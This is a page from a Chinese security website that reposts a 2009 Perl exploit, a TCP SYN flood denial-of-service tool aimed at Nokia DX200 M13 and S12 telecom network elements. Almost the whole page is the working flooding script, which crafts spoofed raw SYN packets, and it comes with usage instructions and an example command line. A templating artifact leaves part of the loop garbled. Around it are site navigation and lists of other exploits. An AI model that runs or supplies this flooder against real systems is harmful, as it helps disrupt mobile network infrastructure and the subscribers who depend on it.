首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Nokia DX200 M13 and S12 TCP SYN flood denial of service exploit
来源:tambarus[at]gmail.com 作者:TaMBaRuS 发布时间:2009-01-23  
#######################################################################
#Vulnerability: Nokia TCP Syn Flood DoS - DX200
#Synopsis : Denial of Service
#Affected Platforms: DX200 M13 (MGW/HLR), S12 (BSC)
#Severity: High Risk
#Vendor: Nokia (http://www.nokia.com/)
#Exploit Release Date:  01/21/2009
#By: tambarus (tambarus@gmail.com)
#######################################################################

#!/usr/bin/perl

eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "1.0";
print "$0, $PgmName, V $VERSION \n";
GetOptions ( 
"help" =>\$usage,
"device=s" => \$device, 
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;} 

if (!$device) {
$device= 'eth0'; # Enter Nokia DX200 IP
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "BLASTNOKIA"; # TCP payload
my $count=0;

#Initialize Progres Bar 
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);

if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else { 
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}

for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip 
},

tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update(
___FCKpd___0
); $count++; } sub usage { print <<EOF ; This vulnerability is already disclosed and can be exploited by TCP Syn Flooding. usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC] [--destmac=MAC] [--port=n] Options: --help This message --device Network interface (defaut set eth0) --source Victim source IP --dest Victim destination IP --sourcemac Victim source MAC --destmac MAC Address of the gateway --port TCP port Example: ./NokiaFlooder.pl --device eth0 --source 10.1.1.88 --dest 10.1.1.99 --sourcemac 00:11:22:22:11:00 --destmac 00:11:22:22:11:99 --port 23 EOF exit shift; }

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GuildFTPd FTP server version 0
·EleCard MPEG PLAYER (.m3u file
·VUPlayer 2.49 .ASX local unive
·MediaMonkey 3.0.6 (.m3u file)
·FTPShell Server 4.3 (licence k
·PostgreSQL 8.2/8.3/8.4 UDF for
·Pardal CMS <= 0.2.0 Blind SQL
·MySQL 4/5/6 UDF for Command Ex
·Browser3D 3.5 (.sfs File) Loca
·Merak Media Player 3.2 m3u fil
·Browser3D version 3.5 local bu
·Siemens ADSL SL2-141 CSRF Expl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved